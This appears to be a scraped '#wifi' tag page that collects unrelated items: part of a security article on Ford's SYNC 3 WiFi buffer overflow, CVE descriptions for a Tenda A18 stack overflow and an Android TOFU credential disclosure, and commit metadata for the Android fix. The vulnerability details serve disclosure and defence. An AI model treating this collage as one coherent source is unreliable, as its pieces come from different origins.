A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region.

Ford’s assessment of the vulnerability is that it is highly unlikely to be exploited, since it requires a highly skilled attacker within close proximity of the target vehicle, and the vehicle need to have the engine running and WiFi support enabled. Ford said it isn't aware of any instances of exploitation.

And even if an attacker were to gain RCE on the SYNC 3 system using this vulnerability, the potential damage would be limited, since the system is isolated from critical control functions like steering, throttling, and braking.

Ford says that if drivers are worried, they can disable the WiFi support in the SYNC 3 infotainment system in the Settings menu, which will stop an attacker from being able to exploit the vulnerability.

Ford is still working on a patch, which is expected in the coming weeks and will be presented including instructions how to manually install the patch using a USB flash drive.

**We don’t just report on encryption—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Ford says it’s safe to drive its cars with a WiFi vulnerability

Tenda A18 V15.13.07.09 was discovered to contain a stack overflow via the security parameter in the formWifiBasicSet function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39828: Vulnerability/Tenda/A18/formWifiBasicSet at main · lst-oss/Vulnerability

In processMessageImpl of ClientModeImpl.java, there is a possible credential disclosure in the TOFU flow due to a logic error in the code. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.



)\]}' { "commit": "0d3cb609b0851ea9e5745cc6101e57c2e5e739f2", "tree": "7a0189a8f8573cdefb0afbe02c560cc04bbd86d9", "parents": \[ "bd318b9772759546509f6fdb8648366099dd65ad" \], "author": { "name": "Hai Shalom", "email": "haishalom@google.com", "time": "Thu Mar 02 23:00:56 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu Apr 06 00:38:45 2023 +0000" }, "message": "\[TOFU\] Implement a secure TOFU flow\\n\\nImplement a secure TOFU flow for supporting devices, and\\nnotifications about insecure connections in non-supporting\\ndevices, when insecure configurations are not allowed.\\nHandle the case where insecure enterprise configurations are\\nallowed in the new and secure TOFU flow. In this mode, do not\\ndisconnect the network, do not load certificates, and do not\\nnotify the user about anything.\\nDisplay the correct certificate information in the dialog,\\nremove the email and 8-octet signature from the TOFU dialog, and\\nreplace with user verifiable information: certificate expiration\\ndate (locale adjusted) and a SHA-256 fingerprint of the server\\ncertificate which is locally generated.\\nNetwork admins can calculate the fingerprint of their server\\ncertificate and publish the result to their users, using:\\nopenssl x509 -in server-cert.pem -noout -fingerprint -sha256\\n\\nUpdated-Overlayable: TRUE\\nUpdated-PDD: TRUE\\n\\nBug: 267633332\\nBug: 251910611\\nBug: 250574778\\nTest: atest ClientModeImplTest InsecureEapNetworkHandlerTest\\nTest: atest WifiConfigManagerTest\\nTest: Integration test on R, and T devices with overlay setting\\nof insecure networks allowed and not allowed, and with new\\nconfigs and insecure (Do not validate) configs made with R.\\nTest: Functional test, UI verification with multiple locales\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:a5227527411bc24e6e2c6276f16559c7305b6783)\\nMerged-In: I5cac12cd8c52a8a9425e98dad0fb90893f53e374\\nChange-Id: I5cac12cd8c52a8a9425e98dad0fb90893f53e374\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "2d6d08db5b4540a350d0cc8099849a74e021f211", "old\_mode": 33188, "old\_path": "service/ServiceWifiResources/res/values/overlayable.xml", "new\_id": "4ddba7f7322f680502cd308ba8942bf7839db727", "new\_mode": 33188, "new\_path": "service/ServiceWifiResources/res/values/overlayable.xml" }, { "type": "modify", "old\_id": "15ffcf0adabd9d5306e6ac64b3b8135d0768c967", "old\_mode": 33188, "old\_path": "service/ServiceWifiResources/res/values/strings.xml", "new\_id": "bfcb96a1f8801857cc8dfe2ba8e877a43adbfcb9", "new\_mode": 33188, "new\_path": "service/ServiceWifiResources/res/values/strings.xml" }, { "type": "modify", "old\_id": "92cc9ffce6119ede40f7d08d074399b8b9bc1e41", "old\_mode": 33188, "old\_path": "service/java/com/android/server/wifi/ClientModeImpl.java", "new\_id": "c4c0823db079402feb4ee5f2c833a75f339eae72", "new\_mode": 33188, "new\_path": "service/java/com/android/server/wifi/ClientModeImpl.java" }, { "type": "modify", "old\_id": "225d01c7e55d10b3226fd112e6c4d6ae12f34ca7", "old\_mode": 33188, "old\_path": "service/java/com/android/server/wifi/InsecureEapNetworkHandler.java", "new\_id": "6c55feab7fdfeeec9943cf005f624046e09c2948", "new\_mode": 33188, "new\_path": "service/java/com/android/server/wifi/InsecureEapNetworkHandler.java" }, { "type": "modify", "old\_id": "2079cb82d085a8c3eb69dcabab26d3b73327d346", "old\_mode": 33188, "old\_path": "service/java/com/android/server/wifi/WifiConfigManager.java", "new\_id": "f2a39dadaeb1c9010ab1e28e975c8297a1a14730", "new\_mode": 33188, "new\_path": "service/java/com/android/server/wifi/WifiConfigManager.java" }, { "type": "modify", "old\_id": "a69614090ce52d28a21430b0372ab917e628e308", "old\_mode": 33188, "old\_path": "service/java/com/android/server/wifi/WifiKeyStore.java", "new\_id": "deb2e9d94c36a6380358570288ece5f88581b294", "new\_mode": 33188, "new\_path": "service/java/com/android/server/wifi/WifiKeyStore.java" }, { "type": "modify", "old\_id": "16b05c38892fdc15e3ff23257b591097c92c3280", "old\_mode": 33188, "old\_path": "service/java/com/android/server/wifi/WifiServiceImpl.java", "new\_id": "30ea2482954ffb0f3cf4ed496fc1925ea3915942", "new\_mode": 33188, "new\_path": "service/java/com/android/server/wifi/WifiServiceImpl.java" }, { "type": "modify", "old\_id": "09a596f984cf403feaf85b6ab986de9fbdd05d00", "old\_mode": 33188, "old\_path": "service/proto/src/metrics.proto", "new\_id": "871eb2c750cd50f21e7740a3d3d18463836352f1", "new\_mode": 33188, "new\_path": "service/proto/src/metrics.proto" }, { "type": "modify", "old\_id": "ca8f5b031ceac99ff603d27679d89a0f7a22b208", "old\_mode": 33188, "old\_path": "service/tests/wifitests/src/com/android/server/wifi/ClientModeImplTest.java", "new\_id": "cef996fef1df59033c6e62b544aa05b42170f837", "new\_mode": 33188, "new\_path": "service/tests/wifitests/src/com/android/server/wifi/ClientModeImplTest.java" }, { "type": "modify", "old\_id": "aed3753ffc0f4f69c5bf998f376fe196f506493b", "old\_mode": 33188, "old\_path": "service/tests/wifitests/src/com/android/server/wifi/InsecureEapNetworkHandlerTest.java", "new\_id": "b83f6e7e6c1f89ede082ef11d045996b43f3e6ee", "new\_mode": 33188, "new\_path": "service/tests/wifitests/src/com/android/server/wifi/InsecureEapNetworkHandlerTest.java" }, { "type": "modify", "old\_id": "141dca53afb1a8b9c4b5f700c1257d344857470b", "old\_mode": 33188, "old\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiConfigManagerTest.java", "new\_id": "b707b1d6b06fe564632f77f4e4d61c0fe3f394c9", "new\_mode": 33188, "new\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiConfigManagerTest.java" }, { "type": "modify", "old\_id": "eefa46bb7c13db355460f3d458b90abe3444c771", "old\_mode": 33188, "old\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiConfigurationTestUtil.java", "new\_id": "9dc610b275ee4077d1b832a814059304cf7d243b", "new\_mode": 33188, "new\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiConfigurationTestUtil.java" }, { "type": "modify", "old\_id": "9de443def48ebc9ccc708bf2b2644247aa38faca", "old\_mode": 33188, "old\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiKeyStoreTest.java", "new\_id": "37fbb8f7b27a9902adc4a6994f0e0d2c653d44ed", "new\_mode": 33188, "new\_path": "service/tests/wifitests/src/com/android/server/wifi/WifiKeyStoreTest.java" } \] }

Tag

#wifi